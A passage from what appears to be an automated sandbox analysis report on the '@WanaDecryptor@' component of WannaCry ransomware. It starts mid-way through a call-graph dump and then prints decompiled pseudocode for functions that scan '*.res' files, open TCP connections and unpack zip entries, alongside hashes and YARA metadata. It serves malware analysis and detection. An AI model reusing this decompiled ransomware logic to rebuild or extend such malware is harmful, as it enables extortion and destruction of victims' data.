5365->4916 5366->4918 5390 4044c0 5367->5390 5370 404210 #858 #800 5370->4922 5394 405950 InvalidateRect 5371->5394 5373 40592d 5395 405970 InvalidateRect 5373->5395 5375 40593e 5376 405860 5375->5376 5377 405872 5376->5377 5378 405875 GetClientRect #6197 5376->5378 5377->5378 5378->4927 5380 4058d2 5379->5380 5381 4058d5 GetClientRect #6197 5379->5381 5380->5381 5381->4929 5383 4051f8 5382->5383 5384 40519e #860 5382->5384 5383->4931 5385 4051b1 5384->5385 5386 4051d1 RedrawWindow 5385->5386 5387 4051ea InvalidateRect 5385->5387 5386->4931 5387->5383 5388->4941 5389->4943 5391 4044f8 GetObjectA CreateFontIndirectA #1641 5390->5391 5392 4044ce GetParent #2864 SendMessageA #2860 5390->5392 5393 40427a #2818 #535 5391->5393 5392->5391 5392->5393 5393->5370 5394->5373 5395->5375 5397 406b88 #537 #924 sprintf #800 #800 5396->5397 5398 406bda 5396->5398 5397->5398 5401 406cf0 5398->5401 5400 406be6 #800 5400->4952 5402 406d16 5401->5402 5403 406d19 SendMessageA #353 SendMessageA #1979 5401->5403 5402->5403 5406 406dc0 SendMessageA #823 5403->5406 5407 406e00 SendMessageA 5406->5407 5408 406d7b #665 5406->5408 5410 406ed2 #825 5407->5410 5411 406e2f _strnicmp 5407->5411 5408->5400 5410->5408 5412 406e4b _strnicmp 5411->5412 5413 406e67 5411->5413 5412->5413 5413->5410 5413->5411 5414 406e87 SendMessageA #6136 5413->5414 5414->5413 6058 4059d0 #561 5415 40dad0 5416 40db33 5415->5416 5417 40dadf setsockopt send shutdown closesocket 5415->5417 5417->5416 6456 40dbd0 6457 40dbf0 free 6456->6457 6458 40dbd8 6457->6458 6459 40dbe8 6458->6459 6460 40dbdf #825 6458->6460 6460->6459 5418 40bed0 5419 40bef5 5418->5419 5420 40bf0a #823 5418->5420 5419->5420 5421 40bf2e 5420->5421 5422 40bf27 5420->5422 5424 40bf46 5421->5424 5425 40baf0 99 API calls 5421->5425 5423 40d5e0 4 API calls 5422->5423 5423->5421 5426 40bf6b 5425->5426 5427 40bf72 5426->5427 5428 40bf8a GetComputerNameA GetUserNameA 5426->5428 5429 40dc00 4 API calls 5428->5429 5430 40c013 5429->5430 5431 40dd00 4 API calls 5430->5431 5432 40c01f 5431->5432 5433 40dc00 4 API calls 5432->5433 5434 40c038 5433->5434 5435 40dd00 4 API calls 5434->5435 5436 40c047 5435->5436 5828 404cd0 5833 404cf0 #2414 #2414 #800 #641 5828->5833 5830 404cd8 5831 404ce8 5830->5831 5832 404cdf #825 5830->5832 5832->5831 5833->5830 6057 4019d0 EnableWindow 6059 404dd0 6 API calls 6060 404e3b SendMessageA #3092 6059->6060 6062 404e60 SendMessageA #3092 6060->6062 6064 404e93 SendMessageA 6062->6064 6065 404e7f SendMessageA 6062->6065 5447 4102d0 free 5834 4130d4 ??1type_info@@UAE 5835 4130e3 #825 5834->5835 5836 4130ea 5834->5836 5835->5836 6283 4086e0 #470 GetClientRect SendMessageA #6734 #323 6284 408765 6283->6284 6285 408838 6284->6285 6288 4087bd CreateCompatibleDC #1640 6284->6288 6286 408885 #2754 6285->6286 6287 408869 FillRect 6285->6287 6289 408897 #2381 6286->6289 6287->6289 6315 409e70 CreateCompatibleBitmap #1641 6288->6315 6292 4088b4 6289->6292 6293 408a7d 6289->6293 6292->6293 6295 4088be #3797 6292->6295 6297 409f80 BitBlt 6293->6297 6311 408a5e 6293->6311 6294 408809 6316 409f10 6294->6316 6298 408901 _ftol 6295->6298 6300 408abe 6297->6300 6305 40895e _ftol 6298->6305 6307 40897e 6298->6307 6299 408817 #6194 6299->6285 6302 408ad5 #5785 6300->6302 6303 408ac6 #5785 6300->6303 6302->6311 6303->6311 6305->6307 6306 408afe #640 #755 6308 4089a7 FillRect 6307->6308 6309 4089b8 FillRect 6307->6309 6310 4089ca 6307->6310 6308->6310 6309->6310 6310->6311 6319 409f80 6310->6319 6322 409e20 #2414 6311->6322 6313 408a50 6314 409f10 2 API calls 6313->6314 6314->6311 6315->6294 6317 409f25 #5785 6316->6317 6318 409f18 #5785 6316->6318 6317->6299 6318->6299 6320 409f88 6319->6320 6321 409f8b BitBlt 6319->6321 6320->6321 6321->6313 6322->6306 6323 40c6e0 6324 40c722 #825 6323->6324 6325 40c6ef 6323->6325 6326 40c7b0 #825 6325->6326 6327 40c70d #825 6326->6327 6327->6325 6328 40c721 6327->6328 6328->6324 6474 40cfe0 6481 40d4c0 6474->6481 6476 40cffb 6477 40d4c0 4 API calls 6476->6477 6480 40d05e 6476->6480 6478 40d031 6477->6478 6479 40d4c0 4 API calls 6478->6479 6478->6480 6479->6480 6482 40d4d0 6481->6482 6483 40d4d9 6481->6483 6482->6476 6484 40d4e4 6483->6484 6485 40d4ee time 6483->6485 6484->6476 6486 40d575 6485->6486 6489 40d50a 6485->6489 6487 40d58a 6486->6487 6488 40d2b0 memmove 6486->6488 6487->6476 6488->6487 6489->6486 6490 40d569 time 6489->6490 6491 40d551 Sleep 6489->6491 6490->6486 6490->6489 6491->6489 4755 4043e0 #4284 #3874 #5277 5837 40a0e0 Escape 5838 4068e0 5839 4068ef 5838->5839 5840 40691a #5280 5839->5840 5841 4068fc 5839->5841 6465 404fe0 #6334 6466 404ff4 #4853 6465->6466 6467 404ffb 6465->6467 6466->6467 6078 405df0 6083 405d90 #654 #765 6078->6083 6080 405df8 6081 405e08 6080->6081 6082 405dff #825 6080->6082 6082->6081 6083->6080 5842 4090f0 5843 409124 #540 #3874 5842->5843 5844 40971e 5842->5844 5845 409185 5843->5845 5846 40915e 5843->5846 5848 40919c _ftol 5845->5848 5849 40918e #860 5845->5849 5847 40917c 5846->5847 5850 40916e #860 5846->5850 5851 4091d5 SendMessageA #2860 5847->5851 5852 40970a #800 5847->5852 5848->5847 5849->5848 5850->5847 5853 409208 5851->5853 5852->5844 5868 409870 5853->5868 5855 409232 #5875 #6170 GetWindowOrgEx #540 #2818 5857 409329 GetObjectA 5855->5857 5858 40935b GetTextExtentPoint32A 5855->5858 5857->5858 5860 40938b GetViewportOrgEx 5858->5860 5864 409411 5860->5864 5861 409630 #800 5862 409662 5861->5862 5863 40965a #6170 5861->5863 5865 409685 #2414 #2414 5862->5865 5866 40967d #5875 5862->5866 5863->5862 5864->5861 5865->5852 5866->5865 5869 409880 #2414 5868->5869 5869->5855 6329 406ef0 6330 406f03 #823 6329->6330 6331 406f6a 6329->6331 6330->6331 6332 406f25 SendMessageA ShellExecuteA #825 6330->6332 6332->6331 6067 4011f0 6068 40120b #5280 6067->6068 6069 4011fd 6067->6069 6069->6068 6070 401203 6069->6070 6071 4019f0 #765 6072 401a08 6071->6072 6073 4019ff #825 6071->6073 6073->6072 6074 4059f0 6075 4059f8 6074->6075 6076 405a08 6075->6076 6077 4059ff #825 6075->6077 6077->6076 6492 4067f0 IsIconic 6493 406808 7 API calls 6492->6493 6494 40689a #2379 6492->6494 6495 409ff0 ExtTextOutA 6090 405580 GetClientRect 6091 4055c7 7 API calls 6090->6091 6092 4057c9 6090->6092 6093 405666 6091->6093 6094 405669 #5785 CreateSolidBrush FillRect 6091->6094 6093->6094 6095 405770 6 API calls 6094->6095 6098 4056b2 6094->6098 6095->6092 6097 4056cd BitBlt 6097->6098 6098->6095 6098->6097 5871 40d880 5874 40d0a0 time srand rand 5871->5874 5873 40d88f 5875 40d0e1 5874->5875 5876 40d0d3 rand 5874->5876 5875->5873 5876->5875 5876->5876 4756 40db80 recv 5877 405080 5882 4050a0 #800 #795 5877->5882 5879 405088 5880 405098 5879->5880 5881 40508f #825 5879->5881 5881->5880 5882->5879 6084 403180 6089 4031a0 #2414 #2414 #616 #693 #641 6084->6089 6086 403188 6087 403198 6086->6087 6088 40318f #825 6086->6088 6088->6087 6089->6086 6334 404280 6335 404290 6334->6335 6336 40428b 6334->6336 6338 4042a0 #6663 6335->6338 6339 4042fd #2379 6335->6339 6337 404530 5 API calls 6336->6337 6337->6335 6340 4042b5 GetParent #2864 SendMessageA #2379 6338->6340 6341 4042e7 ShellExecuteA 6338->6341 6341->6339 6099 408580 #609 6100 408598 6099->6100 6101 40858f #825 6099->6101 6101->6100 6544 409b80 6545 409b99 6544->6545 6546 409ba5 #2379 6545->6546 6547 409b9d 6545->6547 6496 406380 6501 405e10 #2414 #2414 #2414 #2414 6496->6501 6498 406388 6499 406398 6498->6499 6500 40638f #825 6498->6500 6500->6499 6530 403f20 #2414 6501->6530 6503 405ed6 6531 403f20 #2414 6503->6531 6505 405eec 6532 403f20 #2414 6505->6532 6507 405f02 6533 403f20 #2414 6507->6533 6509 405f18 #2414 6534 403f20 #2414 6509->6534 6511 405f50 6535 403f20 #2414 6511->6535 6513 405f66 6536 403f20 #2414 6513->6536 6515 405f7c 6 API calls 6537 4050a0 #800 #795 6515->6537 6517 405ffe 6538 4050a0 #800 #795 6517->6538 6519 40600e 6539 404170 #2414 #800 #800 #795 6519->6539 6521 40601e 6540 404170 #2414 #800 #800 #795 6521->6540 6523 40602e 6541 404170 #2414 #800 #800 #795 6523->6541 6525 40603e 6542 404170 #2414 #800 #800 #795 6525->6542 6527 40604e #654 #765 6543 405d90 #654 #765 6527->6543 6529 406087 #609 #609 #616 #641 6529->6498 6530->6503 6531->6505 6532->6507 6533->6509 6534->6511 6535->6513 6536->6515 6537->6517 6538->6519 6539->6521 6540->6523 6541->6525 6542->6527 6543->6529 5437 407a90 5438 407bf4 #2385 5437->5438 5439 407abd 5437->5439 5439->5438 5446 404c40 #324 #540 #860 5439->5446 5441 407ae2 #2514 5442 407b72 #2414 #2414 #800 #641 5441->5442 5443 407afb 6 API calls 5441->5443 5442->5438 5444 4082c0 141 API calls 5443->5444 5445 407b61 #800 5444->5445 5445->5442 5446->5441 6102 404d90 #2370 #2289 5883 401091 5888 4010c0 #765 #641 5883->5888 5885 4010a8 5886 4010b8 5885->5886 5887 4010af #825 5885->5887 5887->5886 5888->5885 6342 414290 #825 5897 40a0a0 5898 40a0a8 5897->5898 5899 40a0ab GrayStringA 5897->5899 5898->5899 4744 40d6a0 htons socket 4745 40d6f3 bind 4744->4745 4746 40d814 4744->4746 4747 40d717 ioctlsocket 4745->4747 4748 40d809 4745->4748 4747->4748 4749 40d732 connect select 4747->4749 4748->4746 4750 40d80d closesocket 4748->4750 4749->4748 4751 40d78b __WSAFDIsSet 4749->4751 4750->4746 4752 40d79a __WSAFDIsSet 4751->4752 4753 40d7ac ioctlsocket setsockopt setsockopt 4751->4753 4752->4748 4752->4753 4757 4063a0 15 API calls 5906 4034a0 6 API calls 6107 4035a0 SendMessageA 6108 4035e5 OpenClipboard 6107->6108 6109 4037e9 6107->6109 6108->6109 6110 4035f7 SendMessageA 6108->6110 6111 403681 GlobalAlloc 6110->6111 6112 40360f #3301 #924 #800 #800 SendMessageA 6110->6112 6113 4037e3 CloseClipboard 6111->6113 6114 40369b GlobalLock 6111->6114 6112->6111 6112->6112 6113->6109 6115 4036b6 SendMessageA 6114->6115 6116 4036aa GlobalFree 6114->6116 6117 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6115->6117 6118 4036d6 8 API calls 6115->6118 6116->6113 6117->6113 6120 4037bf 6118->6120 6120->6117 6349 40c6a0 6350 40c6b8 6349->6350 6351 40c6aa 6349->6351 6351->6350 6352 40c6be #825 6351->6352 6352->6350 6121 4085a0 #781 6122 4085b8 6121->6122 6123 4085af #825 6121->6123 6123->6122 5889 4098a0 5894 4097e0 5889->5894 5891 4098a8 5892 4098b8 5891->5892 5893 4098af #825 5891->5893 5893->5892 5895 409815 5894->5895 5896 40981e #2414 #2414 5894->5896 5895->5896 5896->5891 6353 404aa3 6354 404ab1 6353->6354 6355 404aaa GlobalFree 6353->6355 6356 404ac0 6354->6356 6357 404ab9 CloseHandle 6354->6357 6355->6354 6357->6356 5907 407cb0 5910 4030e0 #324 #567 #567 5907->5910 5909 407cd6 6 API calls 5910->5909 6124 407db0 6131 401000 #324 #567 6124->6131 6126 407dd7 time 6127 407e09 #2514 6126->6127 6128 407dfe 6126->6128 6129 407e34 #765 #641 6127->6129 6130 407e28 time 6127->6130 6128->6127 6130->6129 6131->6126 6358 40ceb0 6359 40cebc 6358->6359 6360 4130bb 2 API calls 6359->6360 6361 40ceda 6360->6361 5448 4102b0 calloc

                                                      Executed Functions

                                                      Function 004080C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 190 4080c0-40811e FindFirstFileA 191 408124-40812a 190->191 192 40820a-40828f call 401e30 * 2 sprintf #537 call 4082c0 190->192 194 408130-408138 191->194 208 408291-4082a9 #537 call 4082c0 192->208 209 4082ae-4082b8 192->209 196 4081e4-4081f9 FindNextFileA 194->196 197 40813e-408152 194->197 196->194 198 4081ff-408206 FindClose 196->198 197->196 200 408158-408176 sscanf 197->200 198->192 200->196 202 408178-40818e fopen 200->202 202->196 204 408190-4081a8 fread 202->204 206 4081aa-4081b7 204->206 207 4081bd-4081d0 fclose 204->207 206->207 210 4081b9 206->210 207->196 211 4081d2-4081e2 207->211 208->209 210->207 211->196
                                                      C-Code - Quality: 87%
                                                      			E004080C0(intOrPtr __ecx) {
				void _v999;
				char _v1000;
				void* _v1012;
				char _v1100;
				char _v1200;
				char _v1476;
				signed char _v1520;
				intOrPtr _v1648;
				void _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1696;
				void _v1788;
				void _v1792;
				void* _v1796;
				char _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1820;
				char _t44;
				void* _t47;
				void* _t50;
				void* _t54;
				int _t57;
				int _t60;
				struct _IO_FILE* _t61;
				int _t62;
				struct _WIN32_FIND_DATAA* _t74;
				intOrPtr _t103;
				void* _t104;
				struct _IO_FILE* _t105;
				void* _t110;
				intOrPtr _t113;
				void* _t114;
				void* _t126;

				_t103 = __ecx;
				memset( &_v1788, 0, 0x21 << 2);
				_t44 =  *0x421798; // 0x0
				_v1000 = _t44;
				_v1808 = _t103;
				memset( &_v999, 0, 0xf9 << 2);
				_t110 =  &_v1808 + 0x18;
				asm("stosw");
				_t74 =  &_v1520;
				_v1804 = 0;
				asm("stosb"); // executed
				_t47 = FindFirstFileA("*.res", _t74); // executed
				_v1796 = _t47;
				if(_t47 == 0xffffffff) {
					L13:
					_push(_v1804);
					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
					_t113 = _t110 + 0x30;
					_push(0);
					_v1808 = _t113;
					L00412CAA();
					_t79 = _t103;
					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
					if(_t54 != 0xffffffff) {
						return _t54;
					}
					_push(0);
					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
					L00412CAA();
					return E004082C0(_t103, _t113 + 0x340, _t79);
				} else {
					goto L2;
					L11:
					_t104 = _v1796;
					_t74 =  &_v1520;
					_t57 = FindNextFileA(_t104, _t74); // executed
					_t124 = _t57;
					if(_t57 != 0) {
						L2:
						if((_v1520 & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
								_t110 = _t110 + 0xc;
								if(_t60 >= 1) {
									_t61 = fopen( &_v1476, "rb"); // executed
									_t105 = _t61;
									_t110 = _t110 + 8;
									if(_t105 != 0) {
										_t62 = fread( &_v1656, 0x88, 1, _t105); // executed
										_t114 = _t110 + 0x10;
										if(_t62 == 1 && _v1648 == _v1800) {
											_v1804 = _v1804 + 1;
										}
										fclose(_t105); // executed
										_t110 = _t114 + 4;
										if(_v1648 == 0) {
											memcpy( &_v1792,  &_v1656, 0x22 << 2);
											_t110 = _t110 + 0xc;
										}
									}
								}
							}
						}
						goto L11;
					} else {
						FindClose(_t104);
						_t103 = _v1808;
						goto L13;
					}
				}
			}








































                                                      0x004080c9
                                                      0x004080d7
                                                      0x004080d9
                                                      0x004080e3
                                                      0x004080f3
                                                      0x004080f7
                                                      0x004080f7
                                                      0x004080f9
                                                      0x004080fb
                                                      0x00408102
                                                      0x00408110
                                                      0x00408111
                                                      0x0040811a
                                                      0x0040811e
                                                      0x0040820a
                                                      0x0040821c
                                                      0x00408237
                                                      0x00408266
                                                      0x0040826c
                                                      0x00408276
                                                      0x0040827b
                                                      0x00408280
                                                      0x00408285
                                                      0x00408287
                                                      0x0040828f
                                                      0x004082b8
                                                      0x004082b8
                                                      0x00408291
                                                      0x0040829d
                                                      0x004082a2
                                                      0x00000000
                                                      0x00408124
                                                      0x0040812a
                                                      0x004081e4
                                                      0x004081e4
                                                      0x004081e8
                                                      0x004081f1
                                                      0x004081f7
                                                      0x004081f9
                                                      0x00408130
                                                      0x00408138
                                                      0x0040814a
                                                      0x00408152
                                                      0x0040816a
                                                      0x00408170
                                                      0x00408176
                                                      0x00408185
                                                      0x00408187
                                                      0x00408189
                                                      0x0040818e
                                                      0x004081a0
                                                      0x004081a2
                                                      0x004081a8
                                                      0x004081b9
                                                      0x004081b9
                                                      0x004081be
                                                      0x004081cb
                                                      0x004081d0
                                                      0x004081e2
                                                      0x004081e2
                                                      0x004081e2
                                                      0x004081d0
                                                      0x0040818e
                                                      0x00408176
                                                      0x00408152
                                                      0x00000000
                                                      0x004081ff
                                                      0x00408200
                                                      0x00408206
                                                      0x00000000
                                                      0x00408206
                                                      0x004081f9

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                                      • API String ID: 1530363904-2310201135
                                                      • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                                      • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040D6A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 213 40d6a0-40d6ed htons socket 214 40d6f3-40d711 bind 213->214 215 40d814-40d821 213->215 216 40d717-40d72c ioctlsocket 214->216 217 40d809-40d80b 214->217 216->217 218 40d732-40d789 connect select 216->218 217->215 219 40d80d-40d80e closesocket 217->219 218->217 220 40d78b-40d798 __WSAFDIsSet 218->220 219->215 221 40d79a-40d7aa __WSAFDIsSet 220->221 222 40d7ac-40d806 ioctlsocket setsockopt * 2 220->222 221->217 221->222
                                                      APIs
                                                      • htons.WS2_32 ref: 0040D6C7
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                                      • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                                      • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                                      • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                                      • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                                      • closesocket.WS2_32(00000000), ref: 0040D80E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                                      • String ID: `
                                                      • API String ID: 478405425-1850852036
                                                      • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                                      • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                                      • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00411CF0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450COMMONCrypto
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 224 411cf0-411d0b 225 412231-41223f 224->225 226 411d11-411d16 224->226 226->225 227 411d1c-411d1f 226->227 228 411d21-411d27 call 411ac0 227->228 229 411d2a-411d35 227->229 228->229 231 411d37-411d39 229->231 232 411d5a-411d5c 229->232 234 411d3b-411d57 231->234 235 411d5e-411db2 231->235 232->235 236 411db5-411dba 232->236 237 411dc5-411dca 236->237 238 411dbc-411dc2 call 411390 236->238 239 411ddc-411e1a call 411350 call 411460 237->239 240 411dcc-411dda call 4113e0 237->240 238->237 249 411e2d-411e43 call 410a50 239->249 250 411e1c-411e2a 239->250 240->239 253 411e45-411e53 249->253 254 411e56-411e73 #823 call 410af0 249->254 256 411e78-411e81 254->256 257 411e83-411e9a #825 256->257 258 411e9d-411ed9 256->258 259 411ee0-411ee4 258->259 260 411ef0-411ef2 259->260 261 411ee6-411ee9 259->261 263 411ef4-411ef5 260->263 264 411ef7-411ef9 260->264 261->260 262 411eeb-411eee 261->262 262->259 263->259 265 411efb-411efc 264->265 266 411efe-411f0e _mbsstr 264->266 265->259 267 411f10-411f13 266->267 268 411f15-411f25 _mbsstr 266->268 267->259 269 411f27-411f2a 268->269 270 411f2c-411f3c _mbsstr 268->270 269->259 271 411f43-411f53 _mbsstr 270->271 272 411f3e-411f41 270->272 273 411f55-411f58 271->273 274 411f5a-411fa2 271->274 272->259 273->259 275 411fb3-411fda 274->275 276 411fa4-411fa7 274->276 278 411fdc-411fe6 275->278 276->275 277 411fa9-411fac 276->277 277->275 279 411fae-411fb1 277->279 280 411ff2-411ff4 278->280 281 411fe8 278->281 279->275 279->278 282 412004-41200a 280->282 283 411ff6-411ffe 280->283 281->280 284 41201a-41201c 282->284 285 41200c-412014 282->285 283->282 286 41202c-412037 284->286 287 41201e-412026 284->287 285->284 288 412039 286->288 289 41203f-4120b0 call 411b80 LocalFileTimeToFileTime 286->289 287->286 288->289 292 4121f2 289->292 293 4120b6-4120ba 289->293 295 4121f6-4121f8 292->295 294 4120bf-4120d3 293->294 296 4120d7-4120dd 294->296 297 412203-41222e 295->297 298 4121fa-412200 #825 295->298 299 4120fb-4120fd 296->299 300 4120df-4120e1 296->300 298->297 303 412100-412102 299->303 301 4120e3-4120eb 300->301 302 4120f7-4120f9 300->302 301->299 304 4120ed-4120f5 301->304 302->303 305 412104-412117 303->305 306 41211e-41213c 303->306 304->296 304->302 305->294 309 412119 305->309 307 412179-41217b 306->307 308 41213e-412173 call 411b50 306->308 311 4121b8-4121ba 307->311 312 41217d-4121b2 call 411b50 307->312 308->307 309->295 311->295 315 4121bc-4121f0 call 411b50 311->315 312->311 315->295
                                                      C-Code - Quality: 91%
                                                      			E00411CF0(intOrPtr* __ecx) {
				intOrPtr _t142;
				signed int _t147;
				signed int _t149;
				intOrPtr _t150;
				void* _t152;
				signed int _t157;
				signed int _t160;
				unsigned int _t162;
				signed char _t164;
				struct _FILETIME _t177;
				struct _FILETIME _t180;
				intOrPtr _t182;
				signed int _t186;
				signed char _t188;
				struct _FILETIME _t204;
				struct _FILETIME _t212;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				intOrPtr* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				unsigned int _t248;
				signed int _t249;
				int _t252;
				signed char _t264;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed int _t276;
				unsigned int _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t311;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr* _t336;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				void* _t343;
				void* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t312 =  *((intOrPtr*)(_t348 + 0x294));
				_t232 = _t231 | 0xffffffff;
				_t336 = __ecx;
				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
				if(_t312 < _t232) {
					L72:
					return 0x10000;
				} else {
					_t140 =  *__ecx;
					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
							E00411AC0(_t140);
							_t348 = _t348 + 4;
						}
						 *(_t336 + 4) = _t232;
						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
							__eflags = _t312 - _t232;
							if(_t312 != _t232) {
								_t142 =  *_t336;
								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
									E00411390(_t142);
									_t348 = _t348 + 4;
								}
								_t143 =  *_t336;
								__eflags =  *( *_t336 + 0x10) - _t312;
								while(__eflags < 0) {
									E004113E0(_t143);
									_t143 =  *_t336;
									_t348 = _t348 + 4;
									__eflags =  *( *_t336 + 0x10) - _t312;
								}
								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
								_t349 = _t348 + 0x30;
								__eflags = _t147;
								if(_t147 == 0) {
									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
									_t350 = _t349 + 0xc;
									__eflags = _t149;
									if(_t149 == 0) {
										_t150 =  *((intOrPtr*)(_t350 + 0x10));
										_push(_t150); // executed
										L00412CEC(); // executed
										_t313 = _t150;
										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
										_t351 = _t350 + 0x14;
										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
											_t346 =  *(_t351 + 0x29c);
											asm("repne scasb");
											_t248 =  !_t232;
											 *_t346 =  *( *_t336 + 0x10);
											_t337 = _t351 + 0x88 - _t248;
											_t249 = _t248 >> 2;
											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
											__eflags = _t252;
											memcpy(_t337 + _t249 + _t249, _t337, _t252);
											_t353 = _t351 + 0x18;
											_t321 = _t353 + 0x190;
											while(1) {
												_t157 =  *_t321;
												__eflags = _t157;
												if(_t157 == 0) {
													goto L23;
												}
												L21:
												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
													_t321 = _t321 + 2;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												L23:
												__eflags = _t157 - 0x5c;
												if(_t157 == 0x5c) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												__eflags = _t157 - 0x2f;
												if(_t157 == 0x2f) {
													_t321 = _t321 + 1;
													while(1) {
